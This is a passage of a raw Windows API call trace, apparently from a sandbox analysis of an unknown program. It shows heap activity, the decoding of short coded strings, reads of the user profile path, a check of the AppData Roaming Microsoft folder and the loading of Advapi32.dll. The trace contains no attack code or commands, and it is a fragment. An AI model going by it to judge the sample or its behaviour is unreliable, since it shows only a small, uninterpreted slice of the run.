(HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0201.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0201.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0201.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0201.083] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0201.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0201.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0201.084] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0201.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0201.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0201.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0201.084] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0201.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0201.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0201.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0201.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0201.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0201.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0201.085] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0201.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0201.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0201.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0201.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0201.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0201.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0201.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0201.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0201.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0201.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0201.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0201.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0201.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0201.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0201.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0201.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0201.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0201.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0201.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0201.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0201.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0201.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0201.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0201.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0201.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0201.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0201.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0201.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0201.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0201.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0201.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0201.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b3020 [0201.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0201.087] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0201.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0201.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0201.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0201.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0201.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0201.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0201.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0201.087] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0201.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0201.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0201.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0201.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0201.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0201.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0201.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0201.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0201.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x24b3020 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0201.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0201.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0201.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0201.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0201.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0201.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0201.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0201.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0201.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0201.090] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0201.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0201.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0201.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0201.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0201.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0201.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0201.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0201.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.091] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0201.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0201.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0201.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0201.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0201.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0201.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0201.092] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0201.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0201.092] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Microsoft", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa520039, dwReserved1=0x18116, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0xaa58a0 [0201.092] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0201.092] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0201.092] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0201.092] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0201.092] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0201.093] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0201.093] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.093] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0201.093] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0201.093] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0201.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0201.093] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0201.094] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0201.094] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0201.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0201.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0201.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0201.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0201.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0201.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0201.094] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0201.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0201.094] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0201.094] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0201.094] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0201.095] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0201.095] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0201.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0201.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 